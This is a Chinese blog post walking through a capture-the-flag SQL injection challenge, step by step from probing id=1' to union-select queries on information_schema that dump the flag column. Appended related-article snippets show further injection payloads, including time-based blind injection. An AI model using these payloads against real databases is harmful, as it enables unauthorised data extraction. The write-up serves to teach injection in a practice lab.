sql注入第二题

最新推荐文章于 2024-04-19 18:32:25 发布
最新推荐文章于 2024-04-19 18:32:25 发布
阅读量237 收藏
点赞数
文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZYZatLXY/article/details/85265896
版权

CTF 实验吧 这个看起来有点简单

在这里插入图片描述
打开之后长这样,看到网址连接有id=1,想到可能是sql注入

输入2

在这里插入图片描述
有变化!看来是sql注入

输入1’

在这里插入图片描述
报错?报错就对了

输入id=1 and 1=1 和 id=1 and 1=2

在这里插入图片描述
在这里插入图片描述
嗯,没错了,肯定是sql注入

输入id=1 union select 1,2

在这里插入图片描述
判断有两列!爆数据库名

输入id=1 union select 1,schema_name from information_schema.schemata

在这里插入图片描述
获得三个数据库名称,感觉第二个有点可疑,爆表名

输入id=1 union select 1,table_name from information_schema.tables where table_schema=‘my_db’

在这里插入图片描述
看到了thiskey,估计没错了下一个就是字段名

输入id=1 union select 1,column_name from information_schema.columns where table_name=‘thiskey’

在这里插入图片描述
好了k0y肯定是了,爆内容吧

输入id=1 union select 1,k0y from my_db.thiskey

在这里插入图片描述
gotit
提交收工

ZYZatLXY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
黑客情景 - 第2SQL注入(难度:容易)(附答案)
rickyyy2006的博客
10-27 532
目: 我知道你有相当令人敬佩的黑客技能。  这个种族主义仇恨的人正在使用他们的网站组织一个种族主义的聚会。 我们不能容忍这种倾向的侵略。  如果您可以访问其管理员页面并将信息发布到主页面,我们将永远感激。 答案: 1. 比较网站和代码,我们发现有个“update"的链接在代码,但网站没有。按常理推理,这链接是不想公开的。
sql注入攻击与防御第二
10-16
sql注入攻击与防御第二
sql注入,基础练习1-4关卡
haozhe6666的博客
07-20 352
程序员为了防止sql注入,对用户输入中的单引号(')进行处理,在单引号前加上斜杠(\)进行转义,这样被处理后的sql语句中,单引 号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单引号无法发挥和前后单引号闭合的作用,仅仅成为‘内容’;相信大家一定能发现它们之间的微小的区别,这也是数字型和字符型上的一个重要的区别,接下来的注入过程,我们只需要去想方设法的闭合掉 '$id' 前面的'和后面的语句及符号就ok了,然后后面的就是进行正常的一个注入过程了。要进行注入,得先知道是否能进行注入。
SQL注入(一)
彩色代码的博客
05-18 212
SQL注入(SQL Injection)是一种常见的安全漏洞,它允许攻击者通过将恶意的SQL代码插入到应用程序的输入字段中,从而执行非授权的数据库操作。这些只是SQL注入的一些常见示例,实际情况可能更为复杂。为了防止SQL注入攻击,应使用参数化查询或预编译语句,使用安全的API和框架,并对用户输入进行充分验证和转义。
BUUCTF关于sql注入
最新发布
2302_80935968的博客
04-19 688
测试的时候输入了 1’ and ‘1’='1这个有问的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。(select 输入数据 || flag from Flag)
关于一个SQL注入目的思考
12-14
p牛在群里面出了一个好玩的目,正好晚上空虚寂寞冷,做一下暖暖身子,目是: <?php $link = mysqli_connect('localhost', 'root', 'root'); mysqli_select_db($link, 'code'); $table = addslashes($_GET['table']); $sql = "UPDATE `{$table}` SET `username`='admin' WHERE id=1"; if(!mysqli_query($link, $sql)) { echo(mysqli_error($link));
sql注入
weixin_65176639的博客
05-13 260
1.进行vulhub搭建访问 2.进入查询 3.访问htttp://110.40.154.100:8000/admin 用户名为admin 密码为a123123123 4.然后访问htttp://110.40.154.100:8000/admin/vuln/collection/ 搭建自己的用户 5.构造url查询,查看是否注入成功 ...
sql注入41-65
Camillewuxie的博客
02-22 171
Less-41 本关没有回显位也无报错,所以我们用盲注。且为数字型注入,不需要闭合。 采用时间盲注——查询本地数据库:?id=1 and if(ascii(substr((select database()),1,1))>98,sleep(5),1) Less-42 sql语句为 我们先把SQL语句闭合,然后创表,建数据 c’; insert into less42 (username,p...
SQL注入
Pvr1sC的博客
03-17 817
极客大挑战2019 EasySQL 简单,'发现注入点 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 写入1’ or 1=1 # [强网杯 2019]随便注 堆叠注入 在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以
SQL注入攻击与防御-第2版
10-11
主要内容: ·发现、确认和自动发现SQL注入漏洞 ·通过SQL注入利用漏洞 ·在代码中发现SQL注入的方法和技巧 ·利用操作系统的漏洞 ·在代码层和平台层防御SQL注入攻击 ·确定是否已经遭到SQL注入攻击
SQL注入攻击与防御 第2版》PDF版本下载.txt
07-17
SQL注入攻击与防御 第2版》PDF版本下载
SQL注入攻击与防御(第2版).part1
06-26
SQL注入攻击是一种已经长期存在,但近年来日益增长的安全威胁,《安全技术经典译丛:SQL注入攻击与防御(第2版)》致力于深入探讨SQL注入。  《安全技术经典译丛:SQL注入攻击与防御(第2版)》前一版荣获2009...
SQL注入攻击与防御 第2版
03-10
<sql注入攻击与防御> 第2版(高清,完整,带书签) <sql注入攻击与防御> 第2版(高清,完整,带书签)
SQL注入--
lulu001128的博客
07-26 372
过程
SQL注入--第二关详细讲解
MAY的博客
04-18 996
SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
SQL注入的问
u010930648的博客
06-25 358
描述:在利用sql语句进行查询的时候,如果我们按照传入的某个参数进行查询,例如当执行 read("' or 1 or '");时,相应的查询语句变为了 select id,name,money,birthday from user where name='' or 1or '';导致查询结果出错(or 1表示 当name为ture即存在时就满足条件),此时出现sql注入出错的问。为此引入pr...
sql注入面试
m0_61990875的博客
11-08 1044
SQL注入类的面试答案
SQL注入相关【面试
热门推荐
anan的博客
12-09 1万+
本篇文章主要收集和SQL注入相关的面试,持续更新,当然由于博主的时间不太充裕,可能更新会不是很及时,但是相信我,再晚,他都会来!
【CISP-PTE】SQL注入练习
西原一点红的博客
06-26 1356
得到 flag n1book{union_select_is_so_cool}通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。爆出有两个表 Article IS_KEY。发现回显内容被截取,结果显示不全,参考文档。sqlmap注入并执行sql-shell。目明确提示过滤了注释符 # –sqlmap执行sql shell。发现列数为6时,回显字段2。
sql注入攻击与防御第二版 pdf
07-04
SQL注入攻击与防御第二版》是一本关于SQL注入攻击的防御和应对策略的书籍。该书介绍了SQL注入攻击的原理、常见的攻击方式、实际案例以及相应的防御措施。 在防御SQL注入攻击时,我们可以采取以下一些措施: 1. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值